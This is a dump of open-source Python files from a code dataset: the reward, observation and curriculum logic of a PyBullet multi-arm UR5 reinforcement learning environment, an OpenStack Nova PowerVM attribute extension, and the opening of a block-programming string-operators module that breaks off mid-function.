env_config['reward']['survival_penalty']\n self.workspace_radius = env_config['workspace_radius']\n self.individually_reach_target = \\\n env_config['reward']['individually_reach_target']\n self.collectively_reach_target = \\\n env_config['reward']['collectively_reach_target']\n self.cooperative_individual_reach_target = \\\n env_config['reward']['cooperative_individual_reach_target']\n self.collision_penalty = env_config['reward']['collision_penalty']\n proximity_config = env_config['reward']['proximity_penalty']\n self.proximity_penalty_distance = proximity_config['max_distance']\n self.proximity_penalty = proximity_config['penalty']\n self.delta_reward = env_config['reward']['delta']\n self.terminate_on_collectively_reach_target = env_config[\n 'terminate_on_collectively_reach_target']\n self.terminate_on_collision = env_config[\n 'terminate_on_collision']\n self.position_tolerance = env_config['position_tolerance']\n self.orientation_tolerance = env_config['orientation_tolerance']\n self.stop_ur5_after_reach = False\\\n if 'stop_ur5_after_reach' not in env_config \\\n else env_config['stop_ur5_after_reach']\n self.finish_task_in_episode = False\n self.centralized_policy = False \\\n if 'centralized_policy' not in training_config\\\n else training_config['centralized_policy']\n self.centralized_critic = False \\\n if 'centralized_critic' not in training_config\\\n else training_config['centralized_critic']\n\n self.curriculum = env_config['curriculum']\n self.retry_on_fail = env_config['retry_on_fail']\n self.failed_in_task = False\n self.task_manager = None\n self.episode_policy_instance_keys = None\n self.memory_cluster_map = {}\n self.collision_distance = \\\n env_config['collision_distance']\n self.curriculum_level = -1\n self.min_task_difficulty = 0.\n self.max_task_difficulty = 100.0\n if self.logger is not None:\n self.set_level(ray.get(self.logger.get_curriculum_level.remote()))\n\n self.expert_trajectory_threshold = 0.4\\\n if 'expert_trajectory_threshold' not in env_config\\\n else env_config['expert_trajectory_threshold']\n\n if self.gui:\n p.connect(p.GUI)\n else:\n p.connect(p.DIRECT)\n p.resetSimulation()\n p.setAdditionalSearchPath(pybullet_data.getDataPath())\n p.loadURDF(\"plane.urdf\",\n [0, 0, -self.collision_distance - 0.01])\n p.setRealTimeSimulation(0)\n p.setGravity(0, 0, -9.81)\n\n self.all_ur5s = [] # reference to all UR5's in scene\n self.ur5_episode_memories = None\n\n # Keep track of episode progress\n self.current_step = 0\n self.terminate_episode = False\n\n # Visualization\n if self.gui:\n self.real_time_debug = p.addUserDebugParameter(\n 'real-time', 0.0, 1.0, 1.0)\n self.viewer = None\n self.on_setup(env_config, training_config)\n self.setup_action_observation(training_config['observations'])\n self.setup_ur5s(env_config)\n\n def setup_ur5s(self, env_config):\n # Add UR5s\n if env_config['ur5s_position_picker'] == 'evenly_spaced':\n pass\n else:\n print(\"[BaseEnv]\" +\n \" Position Picker not supported: {}\".format(\n env_config['ur5s_position_picker']))\n exit(-1)\n self.all_ur5s = create_ur5s(\n radius=0.5,\n count=self.max_ur5s_count,\n speed=env_config['ur5_speed'])\n self.active_ur5s = []\n self.enable_ur5s()\n\n def disable_all_ur5s(self):\n for i, ur5 in enumerate(self.all_ur5s):\n ur5.disable(idx=i)\n self.active_ur5s = []\n\n def enable_ur5s(self, count=None):\n if count == len(self.active_ur5s):\n return\n self.disable_all_ur5s()\n for i, ur5 in enumerate(self.all_ur5s):\n if count is not None and i == count:\n break\n ur5.enable()\n 
self.active_ur5s.append(ur5)\n\n def reset_stats(self):\n self.stats = {\n # number of steps arm is collided in each episode\n \"collisions\": [0] * len(self.active_ur5s),\n # number of steps arm spends in reached state in each episode\n \"reached\": [0] * len(self.active_ur5s),\n \"collective_reach_count\": 0\n }\n\n def get_pose_residuals(self, poseA, poseB):\n posA = np.array(poseA[0])\n ornA = np.quaternion(*poseA[1])\n\n posB = np.array(poseB[0])\n ornB = np.quaternion(*poseB[1])\n\n pos_residual = np.linalg.norm(posA - posB)\n orn_residual = (ornA * ornB.inverse()).angle()\n # Get smallest positive angle\n orn_residual = orn_residual % (np.pi * 2)\n if orn_residual > np.pi:\n orn_residual = 2 * np.pi - orn_residual\n return pos_residual, orn_residual\n\n def get_ur5_eef_residuals(self):\n residuals = [self.get_pose_residuals(\n target_pose,\n ur5.get_end_effector_pose()\n ) for ur5, target_pose in zip(\n self.active_ur5s,\n self.task_manager.get_target_end_effector_poses()\n )]\n pos_residuals = np.array([res[0] for res in residuals])\n orn_residuals = np.array([res[1] for res in residuals])\n return pos_residuals, orn_residuals\n\n def check_ur5_reached_target(self, i, ur5, target_pose):\n pos_residual, orn_residual = self.get_pose_residuals(\n target_pose,\n ur5.get_end_effector_pose())\n reached_position = pos_residual < self.position_tolerance\n reached_orientation = orn_residual < self.orientation_tolerance\n reached = reached_position and reached_orientation\n if reached:\n self.on_target_reach(ur5, i)\n else:\n ur5.on_untouch_target()\n self.task_manager.targets_visuals[i].normal()\n return reached\n\n def get_state(self):\n \"\"\"\n Collect states of entire environment, and updates variables,\n such as whether or not to terminate episode\n \"\"\"\n colliding = any([ur5.check_collision() for ur5 in self.active_ur5s])\n if colliding:\n self.on_collision()\n self.state = {\n \"ur5s\": []\n }\n\n self.state['ur5s'] = [{\n 'end_effector_pose': ur5.get_end_effector_pose(),\n 'joint_values': ur5.get_arm_joint_values(),\n 'link_positions': ur5.get_link_global_positions(),\n 'ur5': ur5,\n 'pose': ur5.get_pose(),\n 'colliding': False if not colliding else ur5.check_collision(),\n 'target_pose': target_eef_pose,\n 'reached_target': self.check_ur5_reached_target(\n i, ur5, target_eef_pose),\n } for i, (ur5, target_eef_pose) in\n enumerate(zip(self.active_ur5s,\n self.task_manager.get_target_end_effector_poses()))]\n\n self.state['reach_count'] = sum([\n 1 if ur5_state['reached_target']\n else 0 for ur5_state in self.state['ur5s']])\n if self.state['reach_count'] == len(self.active_ur5s):\n self.on_all_ur5s_reach_target()\n\n return self.state\n\n def get_observations(self, state=None, limit=10):\n if state is None:\n state = self.get_state()\n if len(self.history) == 0:\n self.history = [state] * limit\n else:\n self.history.append(state)\n if len(self.history) > limit:\n del self.history[0]\n if self.centralized_policy:\n return [self.centralized_policy_get_observation(self.history)]\n else:\n return [self.get_observation(\n this_ur5=ur5,\n history=self.history)\n for ur5 in self.active_ur5s]\n\n def centralized_policy_get_observation(self, history):\n obs = {\n 'ur5s': []\n }\n for ur5_idx in range(len(self.active_ur5s)):\n obs['ur5s'].append({})\n for item in self.observation_items:\n key = item['name']\n val = None\n if key == 'link_positions':\n val = [list(chain.from_iterable(\n [np.array(link_pos)\n for link_pos in state['ur5s'][ur5_idx][key]]))\n for state in 
history[-(item['history'] + 1):]]\n elif key == 'end_effector_pose' \\\n or key == 'target_pose'\\\n or key == 'pose':\n val = [list(chain.from_iterable(\n state['ur5s'][ur5_idx][key]))\n for state in\n history[-(item['history'] + 1):]]\n else:\n val = [state['ur5s'][ur5_idx][key]\n for state in history[-(item['history'] + 1):]]\n obs['ur5s'][-1][key] = val\n return obs\n\n def get_observation(self, this_ur5, history):\n obs = {\n 'ur5s': [],\n }\n # Sequence Observation\n pos = np.array(this_ur5.get_pose()[0])\n sorted_ur5s = [ur5 for ur5 in self.active_ur5s\n if np.linalg.norm(\n pos - np.array(ur5.get_pose()[0]))\n < 2 * self.workspace_radius]\n # Sort by base distance, furthest to closest\n sorted_ur5s.sort(reverse=True, key=lambda ur5:\n np.linalg.norm(pos - np.array(ur5.get_pose()[0])))\n for ur5 in sorted_ur5s:\n obs['ur5s'].append({})\n ur5_idx = self.active_ur5s.index(ur5)\n for item in self.observation_items:\n key = item['name']\n val = None\n high_freq = 'high_freq' in key\n key = key.split('_high_freq')[0]\n if key == 'joint_values':\n val = [state['ur5s'][ur5_idx][key]\n for state in history[-(item['history'] + 1):]]\n elif 'link_positions' in key:\n # get flatten link positions in ur5's frame of reference\n val = [list(chain.from_iterable(\n [pos_to_high_freq_pos(this_ur5.global_to_ur5_frame(\n position=np.array(link_pos),\n rotation=None)[0])\n if high_freq else\n this_ur5.global_to_ur5_frame(\n position=np.array(link_pos),\n rotation=None)[0]\n for link_pos in state['ur5s'][ur5_idx][key]]))\n for state in history[-(item['history'] + 1):]]\n elif 'end_effector_pose' in key or \\\n 'target_pose' in key\\\n or key == 'pose' or key == 'pose_high_freq':\n val = [list(chain.from_iterable(\n pose_to_high_freq_pose(\n this_ur5.global_to_ur5_frame(\n position=state['ur5s'][ur5_idx][key][0],\n rotation=state['ur5s'][ur5_idx][key][1]))\n if high_freq else\n this_ur5.global_to_ur5_frame(\n position=state['ur5s'][ur5_idx][key][0],\n rotation=state['ur5s'][ur5_idx][key][1])))\n for state in history[-(item['history'] + 1):]]\n else:\n val = [pose_to_high_freq_pose(this_ur5.global_to_ur5_frame(\n state['ur5s'][ur5_idx][key]))\n if high_freq else\n this_ur5.global_to_ur5_frame(\n state['ur5s'][ur5_idx][key])\n for state in history[-(item['history'] + 1):]]\n obs['ur5s'][-1][key] = val\n return obs\n\n def get_rewards(self, state):\n current_ur5_ee_residuals = self.get_ur5_eef_residuals()\n if self.prev_ur5_ee_residuals is None:\n self.prev_ur5_ee_residuals = current_ur5_ee_residuals\n survival_penalties = np.array([\n (self.survival_penalty\n if not ur5_state['reached_target']\n else 0)\n for ur5_state in state['ur5s']\n ])\n\n collision_penalties = np.array([\n (self.collision_penalty if ur5_state['colliding'] else 0)\n for ur5_state in state['ur5s']\n ])\n\n if self.cooperative_individual_reach_target:\n individually_reached_target_rewards = np.array(\n [self.individually_reach_target * state['reach_count']\n for _ in range(len(self.active_ur5s))])\n else:\n individually_reached_target_rewards = np.array([\n (self.individually_reach_target\n if ur5_state['reached_target']\n else 0)\n for ur5_state in state['ur5s']\n ])\n # Only give delta rewards if ee is within a radius\n # away from the target ee\n delta_position_rewards = \\\n [(prev - curr) * self.delta_reward['position']\n if curr < self.delta_reward['activation_radius']\n else 0.0\n for curr, prev in zip(\n current_ur5_ee_residuals[0],\n self.prev_ur5_ee_residuals[0])]\n delta_orientation_rewards = \\\n [(prev - curr) * 
self.delta_reward['orientation']\n if curr_pos_res < self.delta_reward['activation_radius']\n else 0.0\n for curr, prev, curr_pos_res in zip(\n current_ur5_ee_residuals[1],\n self.prev_ur5_ee_residuals[1],\n current_ur5_ee_residuals[0])]\n # proximity penalty\n proximity_penalties = np.array([\n sum([(1 - closest_points_to_other[0][8]\n / self.proximity_penalty_distance)\n * self.proximity_penalty\n for closest_points_to_other in ur5.closest_points_to_others\n if len(closest_points_to_other) > 0 and\n closest_points_to_other[0][8] <\n self.proximity_penalty_distance])\n for ur5 in self.active_ur5s])\n\n collectively_reached_targets = (\n state['reach_count'] == len(self.active_ur5s))\n collective_reached_targets_rewards = np.array(\n [(self.collectively_reach_target\n if collectively_reached_targets\n else 0)\n for _ in range(len(self.active_ur5s))])\n self.prev_ur5_ee_residuals = current_ur5_ee_residuals\n ur5_rewards_sum = \\\n collision_penalties + individually_reached_target_rewards +\\\n collective_reached_targets_rewards + survival_penalties + \\\n proximity_penalties + \\\n delta_position_rewards + delta_orientation_rewards\n if self.centralized_policy:\n return np.array([ur5_rewards_sum.sum()])\n else:\n return ur5_rewards_sum\n\n def step_simulation(self):\n p.stepSimulation()\n\n def finish_up_step(self):\n pass\n\n def step(self, actions):\n if self.terminate_episode:\n return self.reset()\n self.current_step += 1\n rewards = np.zeros(len(self.ur5_episode_memories))\n self.handle_actions(actions)\n\n for t_sim in range(self.simulation_steps_per_action_step):\n p.stepSimulation()\n\n for ur5 in self.active_ur5s:\n ur5.step()\n\n self.state = self.get_state()\n rewards += self.get_rewards(self.state)\n\n self.on_step_simulation(\n self.current_step *\n self.simulation_steps_per_action_step + t_sim,\n self.episode_length * self.simulation_steps_per_action_step,\n self.state)\n\n if self.gui and \\\n p.readUserDebugParameter(self.real_time_debug) == 1.0:\n time.sleep(BaseEnv.SIMULATION_TIMESTEP)\n\n # Check if user wants to end current episode\n rKey = ord('r')\n keys = p.getKeyboardEvents()\n if rKey in keys and keys[rKey] & p.KEY_WAS_TRIGGERED:\n self.terminate_episode = True\n\n if self.terminate_episode:\n break\n\n # Check if ur5 reached target positions\n self.terminate_episode = self.terminate_episode\\\n or self.current_step >= self.episode_length\n\n self.finish_up_step()\n\n self.observations = [self.preprocess_obs(o)\n for o in self.get_observations(state=self.state)]\n\n self.episode_reward_sum += rewards\n\n for o, r, m in zip(\n self.observations,\n rewards,\n self.ur5_episode_memories):\n m.add_rewards_and_termination(r, self.terminate_episode)\n m.add_value('next_observations', o)\n if self.centralized_critic:\n critic_next_obs = []\n for obs in m.data['next_observations'][-1]:\n critic_next_obs.append(torch.cat((\n obs,\n torch.FloatTensor([0.]*6))))\n m.data['critic_next_observations'].append(\n torch.stack(critic_next_obs))\n if not self.terminate_episode:\n m.add_observation(o)\n\n if self.terminate_episode:\n self.on_episode_end()\n\n return self.obs_to_policy(self.observations), self.ray_id\n\n def obs_to_policy(self, obs):\n retval = {}\n for ob, policy_key in zip(obs, self.episode_policy_instance_keys):\n if policy_key not in retval:\n retval[policy_key] = []\n retval[policy_key].append(ob)\n return retval\n\n def send_memory_to_clusters(self):\n ray.get([\n self.memory_cluster_map[\n policy_instance_key].submit_memory.remote(memory)\n for memory, 
policy_instance_key in zip(\n self.ur5_episode_memories, self.episode_policy_instance_keys)])\n\n def get_stats_to_log(self):\n pos_residuals, orn_residuals = self.get_ur5_eef_residuals()\n return {\n 'rewards': np.mean(self.episode_reward_sum),\n 'individual_reach': np.mean(self.stats['reached']),\n 'collective_reach': np.mean(self.stats['collective_reach_count']),\n 'collision': np.mean(self.stats['collisions']) /\n (self.episode_length * self.simulation_steps_per_action_step),\n 'success': self.stats['collective_reach_count']\n if sum(self.stats['collisions']) == 0\n else 0,\n 'curriculum_level': self.curriculum_level,\n 'mean_pos_residual': pos_residuals.mean(),\n 'mean_orn_residual': orn_residuals.mean(),\n 'max_pos_residual': pos_residuals.max(),\n 'max_orn_residual': orn_residuals.max(),\n }\n\n def send_stats_to_logger(self):\n if self.logger is not None:\n logger_curriculum_level = ray.get(self.logger.add_stats.remote(\n self.get_stats_to_log()))\n self.set_level(logger_curriculum_level)\n\n def on_success(self):\n self.task_manager.on_success()\n\n def on_episode_end(self):\n success = self.stats['collective_reach_count']\\\n if sum(self.stats['collisions']) == 0\\\n else 0\n if success != 0:\n self.on_success()\n self.failed_in_task = \\\n self.stats['collective_reach_count'] == 0\\\n or sum(self.stats['collisions']) != 0\n self.send_memory_to_clusters()\n self.send_stats_to_logger()\n\n def reset_memories(self):\n self.ur5_episode_memories = [\n Memory(memory_field)\n for memory_field in self.get_memory_fields()]\n\n def get_memory_fields(self):\n memory_fields = []\n for policy_key in self.episode_policy_instance_keys:\n if self.memory_cluster_map[policy_key] is None:\n memory_fields.append([])\n else:\n memory_fields.append(\n ray.get(\n self.memory_cluster_map[policy_key]\n .get_memory_fields.remote()))\n return memory_fields\n\n def reset(self):\n self.history = []\n self.current_step = 0\n self.episode_counts += 1\n self.finish_task_in_episode = False\n self.setup_task()\n self.reset_memories()\n self.reset_stats()\n self.prev_ur5_ee_residuals = None\n self.on_reset()\n self.episode_reward_sum = np.zeros(len(self.ur5_episode_memories))\n for _ in range(50):\n p.stepSimulation()\n self.observations = [self.preprocess_obs(o)\n for o in self.get_observations()]\n assert len(self.observations) == len(self.ur5_episode_memories)\n for o, m in zip(self.observations, self.ur5_episode_memories):\n m.add_observation(o)\n\n self.terminate_episode = False\n return self.obs_to_policy(self.observations), self.ray_id\n\n def should_get_next_task(self):\n if not self.retry_on_fail:\n return True\n elif not self.failed_in_task:\n return True\n # Only retry failed task if\n # graduate from final curriculum level a while ago\n return False\n\n def get_current_task(self):\n return self.task_manager.current_task\n\n def setup_task(self):\n if self.should_get_next_task() and self.task_manager is not None:\n self.task_manager.setup_next_task(\n max_task_ur5s_count=self.max_task_ur5s_count,\n min_task_ur5s_count=self.min_task_ur5s_count,\n max_task_difficulty=self.max_task_difficulty,\n min_task_difficulty=self.min_task_difficulty)\n self.enable_ur5s(count=self.get_current_task().ur5_count)\n for ur5, ur5_task in zip(self.active_ur5s,\n self.get_current_task()):\n ur5.set_pose(ur5_task['base_pose'])\n ur5.set_arm_joints(ur5_task['start_config'])\n ur5.step()\n assert len(self.memory_cluster_map) == 1\n num_policies = 1 if self.centralized_policy else len(self.active_ur5s)\n 
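# --- editor's sketch (added for illustration; not part of the original baseEnv.py) ---
# get_observation above and handle_actions below share one pattern: keep only peer
# arms whose base lies within 2 * workspace_radius of this arm, then order them by
# base distance, furthest to closest. A minimal standalone version of that pattern,
# assuming poses are (position, orientation) tuples as returned by ur5.get_pose():
import numpy as np

def sort_peers_by_base_distance(this_pose, peer_poses, workspace_radius):
    """Return peer indices within 2 * workspace_radius, furthest first."""
    origin = np.array(this_pose[0])
    distances = [(i, np.linalg.norm(origin - np.array(pose[0])))
                 for i, pose in enumerate(peer_poses)]
    in_range = [(i, d) for i, d in distances if d < 2 * workspace_radius]
    in_range.sort(reverse=True, key=lambda item: item[1])
    return [i for i, _ in in_range]
# --- end sketch ---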
self.episode_policy_instance_keys = [\n key for key in self.memory_cluster_map] * num_policies\n\n def handle_actions(self, actions):\n if self.stop_ur5_after_reach:\n for i, (action, ur5, target_eef_pose) in enumerate(\n zip(actions,\n self.active_ur5s,\n self.task_manager.get_target_end_effector_poses())):\n if self.check_ur5_reached_target(i, ur5, target_eef_pose):\n action = np.zeros(6)\n if self.centralized_policy:\n actions = actions[0]\n self.ur5_episode_memories[0].add_action(actions)\n actions = list(torch.split(actions, 6))\n else:\n for action, m in zip(actions, self.ur5_episode_memories):\n m.add_action(action)\n if self.centralized_critic:\n for this_ur5, memory in zip(self.active_ur5s,\n self.ur5_episode_memories):\n # Sort actions based on base distance\n pos = np.array(this_ur5.get_pose()[0])\n sorted_ur5s = [(action, ur5) for action, ur5 in\n zip(actions, self.active_ur5s)\n if np.linalg.norm(\n pos - np.array(ur5.get_pose()[0]))\n < 2 * self.workspace_radius]\n # Sort by base distance, furthest to closest\n sorted_ur5s.sort(reverse=True, key=lambda item:\n np.linalg.norm(\n pos - np.array(item[1].get_pose()[0])))\n sorted_actions = [action for (action, ur5) in sorted_ur5s]\n # Last action is self, set to zero\n sorted_actions[-1] = torch.FloatTensor([0.]*6)\n # concat actions to previous observations\n critic_obs = []\n for obs, action in zip(\n memory.data['observations'][-1],\n sorted_actions):\n critic_obs.append(torch.cat((obs, action)))\n memory.data['critic_observations'].append(\n torch.stack(critic_obs))\n # also update next_observations\n if len(memory.data['critic_next_observations']):\n memory.data['critic_next_observations'][-1] = \\\n memory.data['critic_observations'][-1]\n self.action_to_robots(actions)\n\n def action_to_robots(self, actions):\n if len(actions) != len(self.active_ur5s):\n print(\"Wrong action dimensions: {} (received) vs {} (correct)\"\n .format(len(actions), len(self.active_ur5s)))\n for line in traceback.format_stack():\n print(line.strip())\n exit()\n for ur5, action in zip(self.active_ur5s, actions):\n if type(action) != np.ndarray:\n action = action.data.numpy()\n if self.action_type == 'delta':\n ur5.control_arm_joints_delta(action)\n elif self.action_type == 'target-norm':\n ur5.control_arm_joints_norm(action)\n else:\n print(\"[BaseEnv] Unsupported action type:\", self.action_type)\n\n def preprocess_obs(self, obs):\n output = []\n for ur5_obs in obs['ur5s']:\n ur5_output = np.array([])\n for key in self.obs_key:\n key = key.split('_high_freq')[0]\n item = ur5_obs[key]\n for history_frame in item:\n ur5_output = np.concatenate((\n ur5_output,\n history_frame))\n output.append(ur5_output)\n output = torch.FloatTensor(output)\n if self.centralized_policy:\n output = output.view(-1)\n return output\n\n def setup_ray(self, id):\n print(\"[BaseEnv] Setting up ray: {}\".format(id))\n self.ray_id = {\"val\": id}\n\n # Callbacks\n def on_setup(self, env_config, training_config):\n pass\n\n def on_collision(self):\n visualize_collision = False\n if visualize_collision:\n self.visualize_collision()\n\n if self.terminate_on_collision:\n self.terminate_episode = True\n\n def visualize_collision(self):\n if self.gui:\n points = set([ur5.prev_collided_with[5]\n for ur5 in self.active_ur5s\n if ur5.prev_collided_with])\n sphere_vs_id = p.createVisualShape(\n p.GEOM_SPHERE,\n radius=0.05,\n rgbaColor=(1, 0, 0, 0.5))\n point_visuals = [p.createMultiBody(\n basePosition=point,\n baseCollisionShapeIndex=-1,\n baseVisualShapeIndex=sphere_vs_id)\n for 
point in points]\n input('\\tCollision: Press ENTER to continue')\n for point_visual in point_visuals:\n p.removeBody(point_visual)\n\n def on_step_simulation(self, curr, max, state):\n \"\"\"\n :param curr: current simulation step in episode\n :param max: maximum number of simulation steps in episode\n :param state: full state of environment at curr time\n :return: None\n \"\"\"\n for i, ur5 in enumerate(self.active_ur5s):\n if state['ur5s'][i]['colliding']:\n self.stats['collisions'][i] += 1\n self.task_manager.set_timer(curr / max)\n\n def on_reset(self):\n pass\n\n def on_all_ur5s_reach_target(self):\n self.stats[\"collective_reach_count\"] += 1\n self.terminate_episode = self.terminate_episode or\\\n self.terminate_on_collectively_reach_target\n self.finish_task_in_episode = True\n\n def on_target_reach(self, ur5, idx):\n ur5.on_touch_target()\n self.task_manager.targets_visuals[idx].touched()\n self.stats[\"reached\"][self.active_ur5s.index(ur5)] += 1\n if self.stop_ur5_after_reach:\n ur5.control_arm_joints(ur5.get_arm_joint_values())\n\n def set_level(self, level):\n if self.curriculum is None:\n return\n if not (level < len(self.curriculum['levels'])):\n return\n elif self.curriculum_level >= level:\n return\n for level_idx in range(self.curriculum_level + 1, level + 1):\n level_config = self.curriculum['levels'][level_idx]\n updated_stats = {}\n for key in level_config:\n if key == 'position_tolerance':\n self.position_tolerance = level_config[key]\n elif key == 'orientation_tolerance':\n self.orientation_tolerance = level_config[key]\n elif key == 'collision_penalty':\n self.collision_penalty = level_config[key]\n elif key == 'max_task_ur5s_count':\n self.max_task_ur5s_count = level_config[key]\n elif key == 'max_task_difficulty':\n self.max_task_difficulty = level_config[key]\n elif key == 'min_task_difficulty':\n self.min_task_difficulty = level_config[key]\n updated_stats[key] = level_config[key]\n output = '[BaseEnv] Level {} '.format(level_idx)\n for key in updated_stats:\n output += '| {}: {}'.format(\n key, updated_stats[key])\n print(output)\n self.curriculum_level = level\n\n\n@ray.remote\nclass ParallelBaseEnv(BaseEnv):\n def __init__(self, env_config, training_config, gui, logger):\n super().__init__(env_config, training_config, gui, logger)\n","repo_name":"columbia-ai-robotics/decentralized-multiarm","sub_path":"environment/baseEnv.py","file_name":"baseEnv.py","file_ext":"py","file_size_in_byte":32600,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"53"} +{"seq_id":"74254350887","text":"from nova.api.openstack import extensions\nfrom nova.api.openstack import wsgi\nfrom nova.api.openstack import xmlutil\n\nauthorize = extensions.soft_extension_authorizer('compute',\n 'extended_powervm')\n\n\nclass ExtendedPowerVMAttributesController(wsgi.Controller):\n\n def gen_pvc_key(self, key):\n self.LOCAL_PVC_PREFIX = 'powervm:'\n if key is None:\n return key\n if key.startswith(self.LOCAL_PVC_PREFIX):\n return key\n return self.LOCAL_PVC_PREFIX + key\n\n def _extend_server(self, context, server, instance):\n metadata = instance['metadata']\n pvc_attrs = ['cpus', 'min_cpus', 'max_cpus', 'cpu_utilization',\n 'min_vcpus', 'max_vcpus',\n 'min_memory_mb', 'max_memory_mb',\n 'root_gb']\n\n key = \"%s:id\" % (Extended_powervm.alias)\n if 'pvc_id' in metadata:\n server[key] = metadata['pvc_id']\n\n key = \"%s:health_status\" % (Extended_powervm.alias)\n health_status = {}\n att = self.gen_pvc_key('health_status.health_value')\n if att in 
metadata:\n health_status['health_value'] = metadata[att]\n del metadata[att]\n # TODO:Here can add other health_status property to construct\n # dictionary data\n server[key] = health_status\n\n for item in pvc_attrs:\n key = \"%s:%s\" % (Extended_powervm.alias, item)\n att = self.gen_pvc_key(item)\n if att in metadata:\n value = metadata[att]\n server[key] = value\n del metadata[att]\n\n @wsgi.extends\n def show(self, req, resp_obj, id):\n context = req.environ['nova.context']\n if authorize(context):\n # Attach our slave template to the response object\n resp_obj.attach(xml=ExtendedPowervmTemplate())\n server = resp_obj.obj['server']\n db_instance = req.get_db_instance(server['id'])\n # server['id'] is guaranteed to be in the cache due to\n # the core API adding it in its 'show' method.\n self._extend_server(context, server, db_instance)\n\n @wsgi.extends\n def detail(self, req, resp_obj):\n context = req.environ['nova.context']\n if authorize(context):\n # Attach our slave template to the response object\n resp_obj.attach(xml=ExtendedPowervmsTemplate())\n\n servers = list(resp_obj.obj['servers'])\n for server in servers:\n db_instance = req.get_db_instance(server['id'])\n # server['id'] is guaranteed to be in the cache due to\n # the core API adding it in its 'detail' method.\n self._extend_server(context, server, db_instance)\n\n\nclass Extended_powervm(extensions.ExtensionDescriptor):\n \"\"\"Extended Server Attributes support.\"\"\"\n name = \"ExtendedPowervm\"\n alias = \"IBM-PVM\"\n namespace = (\"http://docs.openstack.org/compute/ext/\"\n \"extended_powervm/api/v1.1\")\n updated = \"2011-11-03T00:00:00+00:00\"\n\n def get_controller_extensions(self):\n controller = ExtendedPowerVMAttributesController()\n extension = extensions.ControllerExtension(self, 'servers', controller)\n return [extension]\n\n\ndef make_server(elem):\n elem.set('{%s}id' % Extended_powervm.namespace,\n '%s:id' % Extended_powervm.alias)\n\n elem.set('{%s}cpus' % Extended_powervm.namespace,\n '%s:cpus' % Extended_powervm.alias)\n elem.set('{%s}max_cpus' % Extended_powervm.namespace,\n '%s:max_cpus' % Extended_powervm.alias)\n elem.set('{%s}min_cpus' % Extended_powervm.namespace,\n '%s:min_cpus' % Extended_powervm.alias)\n elem.set('{%s}cpu_utilization' % Extended_powervm.namespace,\n '%s:cpu_utilization' % Extended_powervm.alias)\n\n elem.set('{%s}min_vcpus' % Extended_powervm.namespace,\n '%s:min_vcpus' % Extended_powervm.alias)\n elem.set('{%s}max_vcpus' % Extended_powervm.namespace,\n '%s:max_vcpus' % Extended_powervm.alias)\n\n elem.set('{%s}min_memory_mb' % Extended_powervm.namespace,\n '%s:min_memory_mb' % Extended_powervm.alias)\n elem.set('{%s}max_memory_mb' % Extended_powervm.namespace,\n '%s:max_memory_mb' % Extended_powervm.alias)\n\n elem.set('{%s}root_gb' % Extended_powervm.namespace,\n '%s:root_gb' % Extended_powervm.alias)\n elem.set('{%s}health_status' % Extended_powervm.namespace,\n '%s:health_status' % Extended_powervm.alias)\n\n\nclass ExtendedPowervmTemplate(xmlutil.TemplateBuilder):\n def construct(self):\n root = xmlutil.TemplateElement('server', selector='server')\n make_server(root)\n alias = Extended_powervm.alias\n namespace = Extended_powervm.namespace\n return xmlutil.SlaveTemplate(root, 1, nsmap={alias: namespace})\n\n\nclass ExtendedPowervmsTemplate(xmlutil.TemplateBuilder):\n def construct(self):\n root = xmlutil.TemplateElement('servers')\n elem = xmlutil.SubTemplateElement(root, 'server', selector='servers')\n make_server(elem)\n alias = Extended_powervm.alias\n namespace = 
Extended_powervm.namespace\n return xmlutil.SlaveTemplate(root, 1, nsmap={alias: namespace})\n","repo_name":"Gokulk7/PowerVC-Drivers-clone","sub_path":"nova-powervc/powervc/nova/extension/extended_powervm.py","file_name":"extended_powervm.py","file_ext":"py","file_size_in_byte":5324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"664288756","text":"from engine.blocks.block import pyblock, PyBlockDefinition, collect_blocks\nfrom engine.blocks.fields import Variable\nfrom engine.blocks.inputs import InputValue\nfrom engine.executor.context import Context\nfrom engine.executor.variable_reference import VariableRef\n\noperator_color = \"#59C059\"\n\n\n@pyblock(\n category=\"operators\",\n definition=PyBlockDefinition(\n title=\"trim %1\",\n arguments=[\n InputValue(name=\"STRING\")\n ],\n color=operator_color,\n extensions=[\"output_string\"]\n )\n)\ndef string_trim(context: Context, string: str):\n return str(string).strip()\n\n\n@pyblock(\n category=\"operators\",\n definition=PyBlockDefinition(\n title=\"split %1 on %2 to %3\",\n arguments=[\n InputValue(name=\"STRING\"),\n InputValue(name=\"CHARS\"),\n Variable(name=\"VARIABLE\", variable=\"list\", variableTypes=[\"list\"])\n ],\n has_next_statement=True,\n has_previous_statement=True,\n color=operator_color\n )\n)\nasync def string_splitvar(context: Context, string: str, chars: str, variable: VariableRef):\n context.set_variable(variable, str(string).split(str(chars)))\n await context.next()\n\n# Deprecated\n@pyblock(\n category=\"operators\",\n definition=PyBlockDefinition(\n title=\"split %1 on newline to %3\",\n arguments=[\n InputValue(name=\"STRING\"),\n Variable(name=\"VARIABLE\", variable=\"list\", variableTypes=[\"list\"])\n ],\n has_next_statement=True,\n has_previous_statement=True,\n color=operator_color\n )\n)\nasync def string_splitvarnewline(context: Context, string: str, variable: VariableRef):\n context.set_variable(variable, str(string).split(\"\\n\"))\n await context.next()\n\n\n@pyblock(\n category=\"operators\",\n definition=PyBlockDefinition(\n title=\"join %1 with %2\",\n arguments=[\n Variable(name=\"VARIABLE\", variable=\"list\", variableTypes=[\"list\"]),\n InputValue(name=\"CHARS\"),\n ],\n color=operator_color,\n extensions=[\"output_string\"]\n )\n)\nasync def string_join(context: Context, variable: VariableRef, chars: str):\n var_value: list[str] = context.get_variable(variable)\n if type(var_value) != list:\n var_value = list(var_value)\n return str(chars).join(var_value)\n\n\n@pyblock(\n category=\"operators\",\n definition=PyBlockDefinition(\n title=\"newline\",\n color=operator_color,\n extensions=[\"output_string\"]\n )\n)\ndef string_newline(context: Context):\n return \"\\n\"\n\n\n@pyblock(\n category=\"operators\",\n definition=PyBlockDefinition(\n title=\"split %1 on %2\",\n arguments=[\n InputValue(name=\"STRING\"),\n InputValue(name=\"CHARS\")\n ],\n color=operator_color,\n extensions=[\"output_string\"]\n )\n)\ndef string_split(context: Context, string: str, chars: str):\n return str(string).split(str(chars))\n\n\n@pyblock(\n category=\"operators\",\n definition=PyBlockDefinition(\n title=\"substring from %1 to %2 of %3\",\n arguments=[\n InputValue(name=\"START\"),\n InputValue(name=\"END\"),\n InputValue(name=\"STRING\")\n ],\n color=operator_color,\n extensions=[\"output_string\"]\n )\n)\ndef string_substring(context: Context, 